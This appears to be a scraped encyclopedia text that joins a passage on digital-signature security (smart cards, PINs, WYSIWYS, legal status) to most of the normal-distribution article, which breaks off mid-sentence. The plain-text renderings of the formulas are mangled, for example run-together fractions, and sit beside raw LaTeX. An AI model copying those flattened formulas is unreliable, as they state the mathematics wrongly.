from the document is sent to the smart card, whose CPU signs the hash using the stored private key of the user, and then returns the signed hash. Typically, a user must activate their smart card by entering apersonal identification numberor PIN code (thus providingtwo-factor authentication). It can be arranged that the private key never leaves the smart card, although this is not always implemented. If the smart card is stolen, the thief will still need the PIN code to generate a digital signature. This reduces the security of the scheme to that of the PIN system, although it still requires an attacker to possess the card. A mitigating factor is that private keys, if generated and stored on smart cards, are usually regarded as difficult to copy, and are assumed to exist in exactly one copy. Thus, the loss of the smart card may be detected by the owner and the corresponding certificate can be immediately revoked. Private keys that are protected by software only may be easier to copy, and such compromises are far more difficult to detect. Entering a PIN code to activate the smart card commonly requires anumeric keypad. Some card readers have their own numeric keypad. This is safer than using a card reader integrated into a PC, and then entering the PIN using that computer's keyboard. Readers with a numeric keypad are meant to circumvent the eavesdropping threat where the computer might be running akeystroke logger, potentially compromising the PIN code. Specialized card readers are also less vulnerable to tampering with their software or hardware and are oftenEAL3certified. Smart card design is an active field, and there are smart card schemes which are intended to avoid these particular problems, despite having few security proofs so far. One of the main differences between a digital signature and a written signature is that the user does not "see" what they sign. The user application presents a hash code to be signed by the digital signing algorithm using the private key. An attacker who gains control of the user's PC can possibly replace the user application with a foreign substitute, in effect replacing the user's own communications with those of the attacker. This could allow a malicious application to trick a user into signing any document by displaying the user's original on-screen, but presenting the attacker's own documents to the signing application. To protect against this scenario, an authentication system can be set up between the user's application (word processor, email client, etc.) and the signing application. The general idea is to provide some means for both the user application and signing application to verify each other's integrity. For example, the signing application may require all requests to come from digitally signed binaries. One of the main differences between acloudbased digital signature service and a locally provided one is risk. Many risk averse companies, including governments, financial and medical institutions, and payment processors require more secure standards, likeFIPS 140-2level 3 andFIPS 201certification, to ensure the signature is validated and secure. Technically speaking, a digital signature applies to a string of bits, whereas humans and applications "believe" that they sign the semantic interpretation of those bits. In order to be semantically interpreted, the bit string must be transformed into a form that is meaningful for humans and applications, and this is done through a combination of hardware and software based processes on a computer system. The problem is that the semantic interpretation of bits can change as a function of the processes used to transform the bits into semantic content. It is relatively easy to change the interpretation of a digital document by implementing changes on the computer system where the document is being processed. From a semantic perspective this creates uncertainty about what exactly has been signed. WYSIWYS (What You See Is What You Sign)[40]means that the semantic interpretation of a signed message cannot be changed. In particular this also means that a message cannot contain hidden information that the signer is unaware of, and that can be revealed after the signature has been applied. WYSIWYS is a requirement for the validity of digital signatures, but this requirement is difficult to guarantee because of the increasing complexity of modern computer systems. The term WYSIWYS was coined byPeter LandrockandTorben Pedersento describe some of the principles in delivering secure and legally binding digital signatures for Pan-European projects.[40] An ink signature could be replicated from one document to another by copying the image manually or digitally, but to have credible signature copies that can resist some scrutiny is a significant manual or technical skill, and to produce ink signature copies that resist professional scrutiny is very difficult. Digital signatures cryptographically bind an electronic identity to an electronic document and the digital signature cannot be copied to another document. Paper contracts sometimes have the ink signature block on the last page, and the previous pages may be replaced after a signature is applied. Digital signatures can be applied to an entire document, such that the digital signature on the last page will indicate tampering if any data on any of the pages have been altered, but this can also be achieved by signing with ink and numbering all pages of the contract. Most digital signature schemes share the following goals regardless of cryptographic theory or legal provision: Only if all of these conditions are met will a digital signature actually be any evidence of who sent the message, and therefore of their assent to its contents. Legal enactment cannot change this reality of the existing engineering possibilities, though some such have not reflected this actuality. Legislatures, being importuned by businesses expecting to profit from operating a PKI, or by the technological avant-garde advocating new solutions to old problems, have enacted statutes and/or regulations in many jurisdictions authorizing, endorsing, encouraging, or permitting digital signatures and providing for (or limiting) their legal effect. The first appears to have been inUtahin the United States, followed closely by the statesMassachusettsandCalifornia. Other countries have also passed statutes or issued regulations in this area as well and the UN has had an active model law project for some time. These enactments (or proposed enactments) vary from place to place, have typically embodied expectations at variance (optimistically or pessimistically) with the state of the underlying cryptographic engineering, and have had the net effect of confusing potential users and specifiers, nearly all of whom are not cryptographically knowledgeable. Adoption of technical standards for digital signatures have lagged behind much of the legislation, delaying a more or less unified engineering position oninteroperability,algorithmchoice,key lengths, and so on what the engineering is attempting to provide. Some industries have established common interoperability standards for the use of digital signatures between members of the industry and with regulators. These include theAutomotive Network Exchangefor the automobile industry and the SAFE-BioPharma Association for thehealthcare industry. In several countries, a digital signature has a status somewhat like that of a traditional pen and paper signature, as in the1999 EU digital signature directiveand2014 EU follow-on legislation.[15]Generally, these provisions mean that anything digitally signed legally binds the signer of the document to the terms therein. For that reason, it is often thought best to use separate key pairs for encrypting and signing. Using the encryption key pair, a person can engage in an encrypted conversation (e.g., regarding a real estate transaction), but the encryption does not legally sign every message he or she sends. Only when both parties come to an agreement do they sign a contract with their signing keys, and only then are they legally bound by the terms of a specific document. After signing, the document can be sent over the encrypted link. If a signing key is lost or compromised, it can be revoked to mitigate any future transactions. If an encryption key is lost, a backup orkey escrowshould be utilized to continue viewing encrypted content. Signing keys should never be backed up or escrowed unless the backup destination is securely encrypted.
https://en.wikipedia.org/wiki/Digital_signature#Security_properties
I(μ,σ)=(1/σ2002/σ2){\displaystyle {\mathcal {I}}(\mu ,\sigma )={\begin{pmatrix}1/\sigma ^{2}&0\\0&2/\sigma ^{2}\end{pmatrix}}} Inprobability theoryandstatistics, anormal distributionorGaussian distributionis a type ofcontinuous probability distributionfor areal-valuedrandom variable. The general form of itsprobability density functionis[2][3]f(x)=12πσ2e−(x−μ)22σ2.{\displaystyle f(x)={\frac {1}{\sqrt {2\pi \sigma ^{2}}}}e^{-{\frac {(x-\mu )^{2}}{2\sigma ^{2}}}}\,.} The parameter⁠μ{\displaystyle \mu }⁠is themeanorexpectationof the distribution (and also itsmedianandmode), while the parameterσ2{\textstyle \sigma ^{2}}is thevariance. Thestandard deviationof the distribution is⁠σ{\displaystyle \sigma }⁠(sigma). A random variable with a Gaussian distribution is said to benormally distributed, and is called anormal deviate. Normal distributions are important instatisticsand are often used in thenaturalandsocial sciencesto represent real-valuedrandom variableswhose distributions are not known.[4][5]Their importance is partly due to thecentral limit theorem. It states that, under some conditions, the average of many samples (observations) of a random variable with finite mean and variance is itself a random variable—whose distributionconvergesto a normal distribution as the number of samples increases. Therefore, physical quantities that are expected to be the sum of many independent processes, such asmeasurement errors, often have distributions that are nearly normal.[6] Moreover, Gaussian distributions have some unique properties that are valuable in analytic studies. For instance, anylinear combinationof a fixed collection of independent normal deviates is a normal deviate. Many results and methods, such aspropagation of uncertaintyandleast squares[7]parameter fitting, can be derived analytically in explicit form when the relevant variables are normally distributed. A normal distribution is sometimes informally called abell curve.[8]However, many other distributions arebell-shaped(such as theCauchy,Student'st, andlogisticdistributions). (For other names, seeNaming.) Theunivariate probability distributionis generalized forvectorsin themultivariate normal distributionand for matrices in thematrix normal distribution. The simplest case of a normal distribution is known as thestandard normal distributionorunit normal distribution. This is a special case whenμ=0{\textstyle \mu =0}andσ2=1{\textstyle \sigma ^{2}=1}, and it is described by thisprobability density function(or density):φ(z)=e−z2/22π.{\displaystyle \varphi (z)={\frac {e^{-z^{2}/2}}{\sqrt {2\pi }}}\,.}The variable⁠z{\displaystyle z}⁠has a mean of 0 and a variance and standard deviation of 1. The densityφ(z){\textstyle \varphi (z)}has its peak12π{\textstyle {\frac {1}{\sqrt {2\pi }}}}atz=0{\textstyle z=0}andinflection pointsatz=+1{\textstyle z=+1}and⁠z=−1{\displaystyle z=-1}⁠. Although the density above is most commonly known as thestandard normal,a few authors have used that term to describe other versions of the normal distribution.Carl Friedrich Gauss, for example, once defined the standard normal asφ(z)=e−z2π,{\displaystyle \varphi (z)={\frac {e^{-z^{2}}}{\sqrt {\pi }}},}which has a variance of⁠12{\displaystyle {\frac {1}{2}}}⁠, andStephen Stigler[9]once defined the standard normal asφ(z)=e−πz2,{\displaystyle \varphi (z)=e^{-\pi z^{2}},}which has a simple functional form and a variance ofσ2=12π.{\textstyle \sigma ^{2}={\frac {1}{2\pi }}.} Every normal distribution is a version of the standard normal distribution, whose domain has been stretched by a factor⁠σ{\displaystyle \sigma }⁠(the standard deviation) and then translated by⁠μ{\displaystyle \mu }⁠(the mean value): f(x∣μ,σ2)=1σφ(x−μσ).{\displaystyle f(x\mid \mu ,\sigma ^{2})={\frac {1}{\sigma }}\varphi \left({\frac {x-\mu }{\sigma }}\right)\,.} The probability density must be scaled by1/σ{\textstyle 1/\sigma }so that theintegralis still 1. If⁠Z{\displaystyle Z}⁠is astandard normal deviate, thenX=σZ+μ{\textstyle X=\sigma Z+\mu }will have a normal distribution with expected value⁠μ{\displaystyle \mu }⁠and standard deviation⁠σ{\displaystyle \sigma }⁠. This is equivalent to saying that the standard normal distribution⁠Z{\displaystyle Z}⁠can be scaled/stretched by a factor of⁠σ{\displaystyle \sigma }⁠and shifted by⁠μ{\displaystyle \mu }⁠to yield a different normal distribution, called⁠X{\displaystyle X}⁠. Conversely, if⁠X{\displaystyle X}⁠is a normal deviate with parameters⁠μ{\displaystyle \mu }⁠andσ2{\textstyle \sigma ^{2}}, then this⁠X{\displaystyle X}⁠distribution can be re-scaled and shifted via the formulaZ=(X−μ)/σ{\textstyle Z=(X-\mu )/\sigma }to convert it to the standard normal distribution. This variate is also called the standardized form of⁠X{\displaystyle X}⁠. The probability density of the standard Gaussian distribution (standard normal distribution, with zero mean and unit variance) is often denoted with the Greek letter⁠ϕ{\displaystyle \phi }⁠(phi).[10]The alternative form of the Greek letter phi,⁠φ{\displaystyle \varphi }⁠, is also used quite often. The normal distribution is often referred to asN(μ,σ2){\textstyle N(\mu ,\sigma ^{2})}or⁠N(μ,σ2){\displaystyle {\mathcal {N}}(\mu ,\sigma ^{2})}⁠.[11]Thus when a random variable⁠X{\displaystyle X}⁠is normally distributed with mean⁠μ{\displaystyle \mu }⁠and standard deviation⁠σ{\displaystyle \sigma }⁠, one may write X∼N(μ,σ2).{\displaystyle X\sim {\mathcal {N}}(\mu ,\sigma ^{2}).} Some authors advocate using theprecision⁠τ{\displaystyle \tau }⁠as the parameter defining the width of the distribution, instead of the standard deviation⁠σ{\displaystyle \sigma }⁠or the variance⁠σ2{\displaystyle \sigma ^{2}}⁠. The precision is normally defined as the reciprocal of the variance,⁠1/σ2{\displaystyle 1/\sigma ^{2}}⁠.[12]The formula for the distribution then becomes f(x)=τ2πe−τ(x−μ)2/2.{\displaystyle f(x)={\sqrt {\frac {\tau }{2\pi }}}e^{-\tau (x-\mu )^{2}/2}.} This choice is claimed to have advantages in numerical computations when⁠σ{\displaystyle \sigma }⁠is very close to zero, and simplifies formulas in some contexts, such as in theBayesian inferenceof variables withmultivariate normal distribution. Alternatively, the reciprocal of the standard deviationτ′=1/σ{\textstyle \tau '=1/\sigma }might be defined as theprecision, in which case the expression of the normal distribution becomes f(x)=τ′2πe−(τ′)2(x−μ)2/2.{\displaystyle f(x)={\frac {\tau '}{\sqrt {2\pi }}}e^{-(\tau ')^{2}(x-\mu )^{2}/2}.} According to Stigler, this formulation is advantageous because of a much simpler and easier-to-remember formula, and simple approximate formulas for thequantilesof the distribution. Normal distributions form anexponential familywithnatural parametersθ1=μσ2{\textstyle \textstyle \theta _{1}={\frac {\mu }{\sigma ^{2}}}}andθ2=−12σ2{\textstyle \textstyle \theta _{2}={\frac {-1}{2\sigma ^{2}}}}, and natural statisticsxandx2. The dual expectation parameters for normal distribution areη1=μandη2=μ2+σ2. Thecumulative distribution function(CDF) of the standard normal distribution, usually denoted with the capital Greek letter⁠Φ{\displaystyle \Phi }⁠, is the integral Φ(x)=12π∫−∞xe−t2/2dt.{\displaystyle \Phi (x)={\frac {1}{\sqrt {2\pi }}}\int _{-\infty }^{x}e^{-t^{2}/2}\,dt\,.} The relatederror functionerf⁡(x){\textstyle \operatorname {erf} (x)}gives the probability of a random variable, with normal distribution of mean 0 and variance 1/2 falling in the range⁠[−x,x]{\displaystyle [-x,x]}⁠. That is: erf⁡(x)=1π∫−xxe−t2dt=2π∫0xe−t2dt.{\displaystyle \operatorname {erf} (x)={\frac {1}{\sqrt {\pi }}}\int _{-x}^{x}e^{-t^{2}}\,dt={\frac {2}{\sqrt {\pi }}}\int _{0}^{x}e^{-t^{2}}\,dt\,.} These integrals cannot be expressed in terms of elementary functions, and are often said to bespecial functions. However, many numerical approximations are known; seebelowfor more. The two functions are closely related, namely Φ(x)=12[1+erf⁡(x2)].{\displaystyle \Phi (x)={\frac {1}{2}}\left[1+\operatorname {erf} \left({\frac {x}{\sqrt {2}}}\right)\right]\,.} For a generic normal distribution with density⁠f{\displaystyle f}⁠, mean⁠μ{\displaystyle \mu }⁠and varianceσ2{\textstyle \sigma ^{2}}, the cumulative distribution function is F(x)=Φ(x−μσ)=12[1+erf⁡(x−μσ2)].{\displaystyle F(x)=\Phi {\left({\frac {x-\mu }{\sigma }}\right)}={\frac {1}{2}}\left[1+\operatorname {erf} \left({\frac {x-\mu }{\sigma {\sqrt {2}}}}\right)\right]\,.} The complement of the standard normal cumulative distribution function,Q(x)=1−Φ(x){\textstyle Q(x)=1-\Phi (x)}, is often called theQ-function, especially in engineering texts.[13][14]It gives the probability that the value of a standard normal random variable⁠X{\displaystyle X}⁠will exceed⁠x{\displaystyle x}⁠:⁠P(X>x){\displaystyle P(X>x)}⁠. Other definitions of the⁠Q{\displaystyle Q}⁠-function, all of which are simple transformations of⁠Φ{\displaystyle \Phi }⁠, are also used occasionally.[15] Thegraphof the standard normal cumulative distribution function⁠Φ{\displaystyle \Phi }⁠has 2-foldrotational symmetryaround the point (0,1/2); that is,⁠Φ(−x)=1−Φ(x){\displaystyle \Phi (-x)=1-\Phi (x)}⁠. Itsantiderivative(indefinite integral) can be expressed as follows:∫Φ(x)dx=xΦ(x)+φ(x)+C.{\displaystyle \int \Phi (x)\,dx=x\Phi (x)+\varphi (x)+C.} The cumulative distribution function of the standard normal distribution can be expanded byintegration by partsinto a series: Φ(x)=12+12π⋅e−x2/2[x+x33+x53⋅5+⋯+x2n+1(2n+1)!!+⋯].{\displaystyle \Phi (x)={\frac {1}{2}}+{\frac {1}{\sqrt {2\pi }}}\cdot e^{-x^{2}/2}\left[x+{\frac {x^{3}}{3}}+{\frac {x^{5}}{3\cdot 5}}+\cdots +{\frac {x^{2n+1}}{(2n+1)!!}}+\cdots \right]\,.} where!!{\textstyle !!}denotes thedouble factorial. Anasymptotic expansionof the cumulative distribution function for largexcan also be derived using integration by parts. For more, seeError function § Asymptotic expansion.[16] A quick approximation to the standard normal distribution's cumulative distribution function can be found by using a Taylor series approximation: Φ(x)≈12+12π∑k=0n(−1)kx(2k+1)2kk!(2k+1).{\displaystyle \Phi (x)\approx {\frac {1}{2}}+{\frac {1}{\sqrt {2\pi }}}\sum _{k=0}^{n}{\frac {(-1)^{k}x^{(2k+1)}}{2^{k}k!(2k+1)}}\,.} The recursive nature of theeax2{\textstyle e^{ax^{2}}}family of derivatives may be used to easily construct a rapidly convergingTaylor seriesexpansion using recursive entries about any point of known value of the distribution,Φ(x0){\textstyle \Phi (x_{0})}: Φ(x)=∑n=0∞Φ(n)(x0)n!(x−x0)n,{\displaystyle \Phi (x)=\sum _{n=0}^{\infty }{\frac {\Phi ^{(n)}(x_{0})}{n!}}(x-x_{0})^{n}\,,} where: Φ(0)(x0)=12π∫−∞x0e−t2/2dtΦ(1)(x0)=12πe−x02/2Φ(n)(x0)=−(x0Φ(n−1)(x0)+(n−2)Φ(n−2)(x0)),n≥2.{\displaystyle {\begin{aligned}\Phi ^{(0)}(x_{0})&={\frac {1}{\sqrt {2\pi }}}\int _{-\infty }^{x_{0}}e^{-t^{2}/2}\,dt\\\Phi ^{(1)}(x_{0})&={\frac {1}{\sqrt {2\pi }}}e^{-x_{0}^{2}/2}\\\Phi ^{(n)}(x_{0})&=-\left(x_{0}\Phi ^{(n-1)}(x_{0})+(n-2)\Phi ^{(n-2)}(x_{0})\right),&n\geq 2\,.\end{aligned}}} An application for the above Taylor series expansion is to useNewton's methodto reverse the computation. That is, if we have a value for thecumulative distribution function,Φ(x){\textstyle \Phi (x)}, but do not know the x needed to obtain theΦ(x){\textstyle \Phi (x)}, we can use Newton's method to find x, and use the Taylor series expansion above to minimize the number of computations. Newton's method is ideal to solve this problem because the first derivative ofΦ(x){\textstyle \Phi (x)}, which is an integral of the normal standard distribution, is the normal standard distribution, and is readily available to use in the Newton's method solution. To solve, select a known approximate solution,x0{\textstyle x_{0}}, to the desired⁠Φ(x){\displaystyle \Phi (x)}⁠.x0{\textstyle x_{0}}may be a value from a distribution table, or an intelligent estimate followed by a computation ofΦ(x0){\textstyle \Phi (x_{0})}using any desired means to compute. Use this value ofx0{\textstyle x_{0}}and the Taylor series expansion above to minimize computations. Repeat the following process until the difference between the computedΦ(xn){\textstyle \Phi (x_{n})}and the desired⁠Φ{\displaystyle \Phi }⁠, which we will callΦ(desired){\textstyle \Phi ({\text{desired}})}, is below a chosen acceptably small error, such as 10−5, 10−15, etc.: xn+1=xn−Φ(xn,x0,Φ(x0))−Φ(desired)Φ′(xn),{\displaystyle x_{n+1}=x_{n}-{\frac {\Phi (x_{n},x_{0},\Phi (x_{0}))-\Phi ({\text{desired}})}{\Phi '(x_{n})}}\,,} where Φ′(xn)=12πe−xn2/2.{\displaystyle \Phi '(x_{n})={\frac {1}{\sqrt {2\pi }}}e^{-x_{n}^{2}/2}\,.} When the repeated computations converge to an error below the chosen acceptably small value,xwill be the value needed to obtain aΦ(x){\textstyle \Phi (x)}of the desired value,⁠Φ(desired){\displaystyle \Phi ({\text{desired}})}⁠. About 68% of values drawn from a normal distribution are within one standard deviationσfrom the mean; about 95% of the values lie within two standard deviations; and about 99.7% are within three standard deviations.[8]This fact is known as the68–95–99.7 (empirical) rule, or the3-sigma rule. More precisely, the probability that a normal deviate lies in the range betweenμ−nσ{\textstyle \mu -n\sigma }andμ+nσ{\textstyle \mu +n\sigma }is given byF(μ+nσ)−F(μ−nσ)=Φ(n)−Φ(−n)=erf⁡(n2).{\displaystyle F(\mu +n\sigma )-F(\mu -n\sigma )=\Phi (n)-\Phi (-n)=\operatorname {erf} \left({\frac {n}{\sqrt {2}}}\right).}To 12 significant digits, the values forn=1,2,…,6{\textstyle n=1,2,\ldots ,6}are: For large⁠n{\displaystyle n}⁠, one can use the approximation1−p≈e−n2/2nπ/2{\textstyle 1-p\approx {\frac {e^{-n^{2}/2}}{n{\sqrt {\pi /2}}}}}. Thequantile functionof a distribution is the inverse of the cumulative distribution function. The quantile function of the standard normal distribution is called theprobit function, and can be expressed in terms of the inverseerror function:Φ−1(p)=2erf−1⁡(2p−1),p∈(0,1).{\displaystyle \Phi ^{-1}(p)={\sqrt {2}}\operatorname {erf} ^{-1}(2p-1),\quad p\in (0,1).}For a normal random variable with mean⁠μ{\displaystyle \mu }⁠and varianceσ2{\textstyle \sigma ^{2}}, the quantile function isF−1(p)=μ+σΦ−1(p)=μ+σ2erf−1⁡(2p−1),p∈(0,1).{\displaystyle F^{-1}(p)=\mu +\sigma \Phi ^{-1}(p)=\mu +\sigma {\sqrt {2}}\operatorname {erf} ^{-1}(2p-1),\quad p\in (0,1).}ThequantileΦ−1(p){\textstyle \Phi ^{-1}(p)}of the standard normal distribution is commonly denoted as⁠zp{\displaystyle z_{p}}⁠. These values are used inhypothesis testing, construction ofconfidence intervalsandQ–Q plots. A normal random variable⁠X{\displaystyle X}⁠will exceedμ+zpσ{\textstyle \mu +z_{p}\sigma }with probability1−p{\textstyle 1-p}, and will lie outside the intervalμ±zpσ{\textstyle \mu \pm z_{p}\sigma }with probability⁠2(1−p){\displaystyle 2(1-p)}⁠. In particular, the quantilez0.975{\textstyle z_{0.975}}is1.96; therefore a normal random variable will lie outside the intervalμ±1.96σ{\textstyle \mu \pm 1.96\sigma }in only 5% of cases. The following table gives the quantilezp{\textstyle z_{p}}such that⁠X{\displaystyle X}⁠will lie in the rangeμ±zpσ{\textstyle \mu \pm z_{p}\sigma }with a specified probability⁠p{\displaystyle p}⁠. These values are useful to determinetolerance intervalforsample averagesand other statisticalestimatorswith normal (orasymptoticallynormal) distributions.[17]The following table shows2erf−1⁡(p)=Φ−1(p+12){\textstyle {\sqrt {2}}\operatorname {erf} ^{-1}(p)=\Phi ^{-1}\left({\frac {p+1}{2}}\right)}, notΦ−1(p){\textstyle \Phi ^{-1}(p)}as defined above. For small⁠p{\displaystyle p}⁠, the quantile function has the usefulasymptotic expansionΦ−1(p)=−ln⁡1p2−ln⁡ln⁡1p2−ln⁡(2π)+o(1).{\textstyle \Phi ^{-1}(p)=-{\sqrt {\ln {\frac {1}{p^{2}}}-\ln \ln {\frac {1}{p^{2}}}-\ln(2\pi )}}+{\mathcal {o}}(1).}[citation needed] The normal distribution is the only distribution whosecumulantsbeyond the first two (i.e., other than the mean andvariance) are zero. It is also the continuous distribution with themaximum entropyfor a specified mean and variance.[18][19]Geary has shown, assuming that the mean and variance are finite, that the normal distribution is the only distribution where the mean and variance calculated from a set of independent draws are independent of each other.[20][21] The normal distribution is a subclass of theelliptical distributions. The normal distribution issymmetricabout its mean, and is non-zero over the entire real line. As such it may not be a suitable model for variables that are inherently positive or strongly skewed, such as theweightof a person or the price of ashare. Such variables may be better described by other distributions, such as thelog-normal distributionor thePareto distribution. The value of the normal density is practically zero when the value⁠x{\displaystyle x}⁠lies more than a fewstandard deviationsaway from the mean (e.g., a spread of three standard deviations covers all but 0.27% of the total distribution). Therefore, it may not be an appropriate model when one expects a significant fraction ofoutliers—values that lie many standard deviations away from the mean—and least squares and otherstatistical inferencemethods that are optimal for normally distributed variables often become highly unreliable when applied to such data. In those cases, a moreheavy-taileddistribution should be assumed and the appropriaterobust statistical inferencemethods applied. The Gaussian distribution belongs to the family ofstable distributionswhich are the attractors of sums ofindependent, identically distributeddistributions whether or not the mean or variance is finite. Except for the Gaussian which is a limiting case, all stable distributions have heavy tails and infinite variance. It is one of the few distributions that are stable and that have probability density functions that can be expressed analytically, the others being theCauchy distributionand theLévy distribution. The normal distribution with densityf(x){\textstyle f(x)}(mean⁠μ{\displaystyle \mu }⁠and varianceσ2>0{\textstyle \sigma ^{2}>0}) has the following properties: Furthermore, the density⁠φ{\displaystyle \varphi }⁠of the standard normal distribution (i.e.μ=0{\textstyle \mu =0}andσ=1{\textstyle \sigma =1}) also has the following properties: The plain and absolutemomentsof a variable⁠X{\displaystyle X}⁠are the expected values ofXp{\textstyle X^{p}}and|X|p{\textstyle |X|^{p}}, respectively. If the expected value⁠μ{\displaystyle \mu }⁠of⁠X{\displaystyle X}⁠is zero, these parameters are calledcentral moments;otherwise, these parameters are callednon-central moments.Usually we are interested only in moments with integer order⁠p{\displaystyle p}⁠. If⁠X{\displaystyle X}⁠has a normal distribution, the non-central moments exist and are finite for any⁠p{\displaystyle p}⁠whose real part is greater than −1. For any non-negative integer⁠p{\displaystyle p}⁠, the plain central moments are:[25]E⁡[(X−μ)p]={0ifpis odd,σp(p−1)!!ifpis even.{\displaystyle \operatorname {E} \left[(X-\mu )^{p}\right]={\begin{cases}0&{\text{if }}p{\text{ is odd,}}\\\sigma ^{p}(p-1)!!&{\text{if }}p{\text{ is even.}}\end{cases}}}Heren!!{\textstyle n!!}denotes thedouble factorial, that is, the product of all numbers from⁠n{\displaystyle n}⁠to 1 that have the same parity asn.{\textstyle n.} The central absolute moments coincide with plain moments for all even orders, but are nonzero for odd orders. For any non-negative integerp,{\textstyle p,} E⁡[|X−μ|p]=σp(p−1)!!⋅{2πifpis odd1ifpis even=σp⋅2p/2Γ(p+12)π.{\displaystyle {\begin{aligned}\operatorname {E} \left[|X-\mu |^{p}\right]&=\sigma ^{p}(p-1)!!\cdot {\begin{cases}{\sqrt {\frac {2}{\pi }}}&{\text{if }}p{\text{ is odd}}\\1&{\text{if }}p{\text{ is even}}\end{cases}}\\&=\sigma ^{p}\cdot {\frac {2^{p/2}\Gamma \left({\frac {p+1}{2}}\right)}{\sqrt {\pi }}}.\end{aligned}}}The last formula is valid also for any non-integerp>−1.{\textstyle p>-1.}When the meanμ≠0,{\textstyle \mu \neq 0,}the plain and absolute moments can be expressed in terms ofconfluent hypergeometric functions1F1{\textstyle {}_{1}F_{1}}andU.{\textstyle U.}[26] E⁡[Xp]=σp⋅(−i2)pU(−p2,12,−μ22σ2),E⁡[|X|p]=σp⋅2p/2Γ(1+p2)π1F1(−p2,12,−μ22σ2).{\displaystyle {\begin{aligned}\operatorname {E} \left[X^{p}\right]&=\sigma ^{p}\cdot {\left(-i{\sqrt {2}}\right)}^{p}\,U{\left(-{\frac {p}{2}},{\frac {1}{2}},-{\frac {\mu ^{2}}{2\sigma ^{2}}}\right)},\\\operatorname {E} \left[|X|^{p}\right]&=\sigma ^{p}\cdot 2^{p/2}{\frac {\Gamma {\left({\frac {1+p}{2}}\right)}}{\sqrt {\pi }}}\,{}_{1}F_{1}{\left(-{\frac {p}{2}},{\frac {1}{2}},-{\frac {\mu ^{2}}{2\sigma ^{2}}}\right)}.\end{aligned}}} These expressions remain valid even if⁠p{\displaystyle p}⁠is not an integer. See alsogeneralized Hermite polynomials. The expectation of⁠X{\displaystyle X}⁠conditioned on the event that⁠X{\displaystyle X}⁠lies in an interval[a,b]{\textstyle [a,b]}is given byE⁡[X∣a<X<b]=μ−σ2f(b)−f(a)F(b)−F(a),{\displaystyle \operatorname {E} \left[X\mid a<X<b\right]=\mu -\sigma ^{2}{\frac {f(b)-f(a)}{F(b)-F(a)}}\,,}where⁠f{\displaystyle f}⁠and⁠F{\displaystyle F}⁠respectively are the density and the cumulative distribution function of⁠X{\displaystyle X}⁠. Forb=∞{\textstyle b=\infty }this is known as theinverse Mills ratio. Note that above, density⁠f{\displaystyle f}⁠of⁠X{\displaystyle X}⁠is used instead of standard normal density as in inverse Mills ratio, so here we haveσ2{\textstyle \sigma ^{2}}instead of⁠σ{\displaystyle \sigma }⁠. TheFourier transformof a normal density⁠f{\displaystyle f}⁠with mean⁠μ{\displaystyle \mu }⁠and varianceσ2{\textstyle \sigma ^{2}}is[27] f^(t)=∫−∞∞f(x)e−itxdx=e−iμte−12(σt)2,{\displaystyle {\hat {f}}(t)=\int _{-\infty }^{\infty }f(x)e^{-itx}\,dx=e^{-i\mu t}e^{-{\frac {1}{2}}(\sigma t)^{2}}\,,} where⁠i{\displaystyle i}⁠is theimaginary unit. If the meanμ=0{\textstyle \mu =0}, the first factor is 1, and the Fourier transform is, apart from a constant factor, a normal density on thefrequency domain, with mean 0 and variance⁠1/σ2{\displaystyle 1/\sigma ^{2}}⁠. In particular, the standard normal distribution⁠φ{\displaystyle \varphi }⁠is aneigenfunctionof the Fourier transform. In probability theory, the Fourier transform of the probability distribution of a real-valued random variable⁠X{\displaystyle X}⁠is closely connected to thecharacteristic functionφX(t){\textstyle \varphi _{X}(t)}of that variable, which is defined as theexpected valueofeitX{\textstyle e^{itX}}, as a function of the real variable⁠t{\displaystyle t}⁠(thefrequencyparameter of the Fourier transform). This definition can be analytically extended to a complex-value variable⁠t{\displaystyle t}⁠.[28]The relation between both is:φX(t)=f^(−t).{\displaystyle \varphi _{X}(t)={\hat {f}}(-t)\,.} Themoment generating functionof a real random variable⁠X{\displaystyle X}⁠is the expected value ofetX{\textstyle e^{tX}}, as a function of the real parameter⁠t{\displaystyle t}⁠. For a normal distribution with density⁠f{\displaystyle f}⁠, mean⁠μ{\displaystyle \mu }⁠and varianceσ2{\textstyle \sigma ^{2}}, the moment generating function exists and is equal to M(t)=E⁡[etX]=f^(it)=eμteσ2t2/2.{\displaystyle M(t)=\operatorname {E} \left[e^{tX}\right]={\hat {f}}(it)=e^{\mu t}e^{\sigma ^{2}t^{2}/2}\,.}For any⁠k{\displaystyle k}⁠, the coefficient of⁠tk/k!{\displaystyle t^{k}/k!}⁠in the moment generating function (expressed as anexponential power seriesin⁠t{\displaystyle t}⁠) is the normal distribution's expected value⁠E⁡[Xk]{\displaystyle \operatorname {E} [X^{k}]}⁠. Thecumulant generating functionis the logarithm of the moment generating function, namely g(t)=ln⁡M(t)=μt+12σ2t2.{\displaystyle g(t)=\ln M(t)=\mu t+{\tfrac {1}{2}}\sigma ^{2}t^{2}\,.} The coefficients of this exponential power series define the cumulants, but because this is a quadratic polynomial in⁠t{\displaystyle t}⁠, only the first twocumulantsare nonzero, namely the mean⁠μ{\displaystyle \mu }⁠and the variance⁠σ2{\displaystyle \sigma ^{2}}⁠. Some authors prefer to instead work with thecharacteristic functionE[eitX] =eiμt−σ2t2/2andln E[eitX] =iμt−⁠1/2⁠σ2t2. WithinStein's methodthe Stein operator and class of a random variableX∼N(μ,σ2){\textstyle X\sim {\mathcal {N}}(\mu ,\sigma ^{2})}areAf(x)=σ2f′(x)−(x−μ)f(x){\textstyle {\mathcal {A}}f(x)=\sigma ^{2}f'(x)-(x-\mu )f(x)}andF{\textstyle {\mathcal {F}}}the class of all absolutely continuous functions⁠f:R→R{\displaystyle \textstyle f:\mathbb {R} \to \mathbb {R} }⁠such that⁠E⁡[|f′(X)|]<∞{\displaystyle \operatorname {E} [\vert f'(X)\vert ]<\infty }⁠. In thelimitwhenσ2{\textstyle \sigma ^{2}}tends to zero, the probability densityf(x){\textstyle f(x)}eventually tends to zero at anyx≠μ{\textstyle x\neq \mu }, but grows without limit ifx=μ{\textstyle x=\mu }, while its integral remains equal to 1. Therefore, the normal distribution cannot be defined as an ordinaryfunctionwhen⁠σ2=0{\displaystyle \sigma ^{2}=0}⁠. However, one can define the normal distribution with zero variance as ageneralized function; specifically, as aDirac delta function⁠δ{\displaystyle \delta }⁠translated by the mean⁠μ{\displaystyle \mu }⁠, that isf(x)=δ(x−μ).{\textstyle f(x)=\delta (x-\mu ).}Its cumulative distribution function is then theHeaviside step functiontranslated by the mean⁠μ{\displaystyle \mu }⁠, namelyF(x)={0ifx<μ1ifx≥μ.{\displaystyle F(x)={\begin{cases}0&{\text{if }}x<\mu \\1&{\text{if }}x\geq \mu \,.\end{cases}}} Of all probability distributions over the reals with a specified finite 